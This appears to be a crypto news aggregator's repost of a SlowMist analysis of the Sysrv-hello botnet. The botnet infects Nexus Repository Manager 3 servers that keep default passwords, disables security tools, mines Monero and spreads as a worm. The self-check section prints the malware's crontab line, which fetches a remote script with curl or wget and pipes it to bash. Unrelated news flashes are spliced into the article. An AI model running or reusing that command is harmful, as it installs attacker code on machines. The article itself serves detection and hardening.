火星链 火星链
Ctrl+D收藏火星链
首页 > Gateio > 正文

REPO:慢雾:技术拆解 Sysrv-hello 僵尸网络入侵原理

作者:

时间:1900/1/1 0:00:00

攻击路径

Sysrv-hello僵尸网络对云上NexusRepositoryManager3存在默认帐号密码的服务器进行攻击,Maven私服部署会用到NexusRepositoryManager3,由于Maven是个流行服务,所以也给了Sysrv-hello僵尸网络的大范围感染机会。

当NexusRepositoryManager3服务对外网开放且存在默认账号密码时,Sysrv-hello就可以直接扫描入侵,利用NexusRepositoryManager3的Tasks功能模块直接运行恶意脚本达到入侵服务器的目的。

慢雾:6月24日至28日Web3生态因安全问题损失近1.5亿美元:7月3日消息,慢雾发推称,自6月24日至6月28日,Web3生态因安全问题遭遇攻击损失149,658,500美元,包括Shido、Ichioka Ventures、Blockchain for dog nose wrinkles、Chibi Finance、Biswap、Themis等。[2023/7/3 22:14:33]

入侵到服务器后会自动下载执行ldr.sh文件,该文件主要功能:1.禁用Linux服务器防火墙(ufw)及清空iptables2.删除aliyun、yunjing等主机安全软件3.禁用apparmor、selinux、watchdog等安全机制4.删除其他竞品5.下载门罗币挖矿程序进行挖矿,文件与进程名为network016.下载第二个木马sysrv进行更高级操作7.在crontab里加上尾巴

慢雾:过去一周Web3生态因安全事件损失约2400万美元:6月19日消息,据慢雾发推称,过去一周Web3生态系统因安全事件损失约2400万美元,包括Atlantis Loans、Ben Armstrong、TrustTheTrident、FPG、Sturdy、Pawnfi、Move VM、Hashflow、DEP/USDT与LEV/USDC、Midas Capital,总计23,795,800美元。[2023/6/19 21:46:18]

第二个木马sysrv的主要功能:1.确保门罗币挖矿程序network01正常运行2.进行蠕虫传播,随机扫描其他IP服务,同样进行NexusRepositoryManager3漏洞利用,同时也会尝试入侵MySQL、Tomcat、WebLogic等服务

声音 | 慢雾:ETC 51%双花攻击所得的所有ETC已归还完毕:据慢雾区消息,ETC 51%攻击后续:继Gate.io宣称攻击者归还了价值10万美金的ETC后,另一家被成功攻击的交易所Yobit近日也宣称收到了攻击者归还的122735 枚 ETC。根据慢雾威胁情报系统的深度关联分析发现:攻击者于UTC时间2019年1月10日11点多完成了攻击所获的所有ETC的归还工作,至此,持续近一周的 ETC 51% 阴云已散。[2019/1/16]

自查方法

进程:network01sysrv

文件:/tmp/network01/tmp/sysrv/tmp/flag.txt

crontab:echo"*/9****(curl-fsSL$cc/ldr.sh||wget-q-O-$cc/ldr.sh)|bash>/dev/null2>&1"|crontab-

端口:52013

存在以上这些,停止备份样本后删除。

加固建议

删除NexusRepositoryManager3Tasks里的恶意代码NexusRepositoryManager3严禁外网访问,严禁默认账号密码NexusRepositoryManager3升级为最新版本被入侵服务器备份重要数据后,重配置或重做检查被入侵服务器是否存在直接访问生产网其他服务的能力,存在则在生产网其他服务所在的服务器上进一步分析是否有异常免责声明:作为区块链信息平台,本站所发布文章仅代表作者个人观点,与链闻ChainNews立场无关。文章内的信息、意见等均仅供参考,并非作为或被视为实际投资建议。

本文来源于非小号媒体平台:

慢雾科技

现已在非小号资讯平台发布68篇作品,

非小号开放平台欢迎币圈作者入驻

入驻指南:

/apply_guide/

本文网址:

/news/9606255.html

免责声明:

1.资讯内容不构成投资建议,投资者应独立决策并自行承担风险

2.本文版权归属原作所有,仅代表作者本人观点,不代表非小号的观点或立场

上一篇:

深入解析MakeDao在新周期里的机遇和风险

标签:RYMAMANPOSIREPOStickManPOSI币REPO币

Gateio热门资讯
SDC:黄石市核心要点

提倡市民在黄石过节,非必要不出境,非必要不出市,避免前往国内疫情中高风险地区。春节农村返乡人员需持7天内有效新冠病核酸检测阴性结果,返乡后实行14天居家健康监测,期间不聚集、不流动,每7天开展.

1900/1/1 0:00:00
比特币:关于BNB(Binance Coin) 交易送积分 轮盘转不停 奖励发放公告

HomiEx已完成"BNB交易送积分轮盘转不停"所有奖励已全部分发,请在“钱包-资产记录”查看分发结果.

1900/1/1 0:00:00
OTB:Hotbit 定于2021年1月25日上线 TLNT (TALENT Coin)

尊敬的用户:Hotbit即将在开启TLNT(TALENTCoin)数字资产服务。具体安排如下:充值时间:2021年01月25日14:00(香港时间)交易时间:2021年01月25日16:00(香.

1900/1/1 0:00:00
DOO:谈喻凯:比特币调整亟待破位 以太坊牛市长虹看1500美元

近期数字货币出现了一颗耀眼的币种—以太坊,随着近期比特币处于调整之中,以太坊乘势而上接连创下新高,多头最高触及1474.99美元一线,1500美元关口亦是近在咫尺.

1900/1/1 0:00:00
BLOC:乐东黎族自治县核心要点

出行暂不需要提供核酸检测阴性证明,如非必要不要前往疫情级别中高风险地区。疫情级别低风险地区进琼凭健康码和个人轨迹证明可通行,抵琼后14天内加强自我健康监测.

1900/1/1 0:00:00
比特币:比特猎手:比特币28850上方趋势看多 以太有较大回调需求

当理解了行情的不完美,不因大起大落而激动,不为错失机会而后悔,而且这些改变,都是在自己内心世界不动声色的完成时,才能真正懂得了交易的真谛.

1900/1/1 0:00:00